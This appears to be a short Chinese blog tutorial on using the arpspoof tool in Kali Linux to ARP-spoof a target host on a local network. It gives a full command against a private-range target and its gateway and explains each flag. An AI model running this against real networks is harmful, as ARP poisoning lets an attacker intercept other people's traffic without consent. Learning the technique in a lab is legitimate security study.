桥接模式配置:https://blog.csdn.net/weixin_43343144/article/details/102679047

 

别人的教程参考:https://blog.csdn.net/chenjie19950809/article/details/78596717

root@kali:~# arpspoof 
Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host


arpspoof -i 网卡(eth0) -t  攻击的目标ip地址 -r kali系统网关ip地址

在kali上使用以下命令:

arpspoof -i eth0 -t 192.168.2.102 -r 192.168.2.1

arpspoof命令 
后面接上与网络有关的-i(interface) 
网卡eth0 
目标-t(target) 
目标IP:192.168.2.102
目标主机网关192.168.2.1

Logo

更多推荐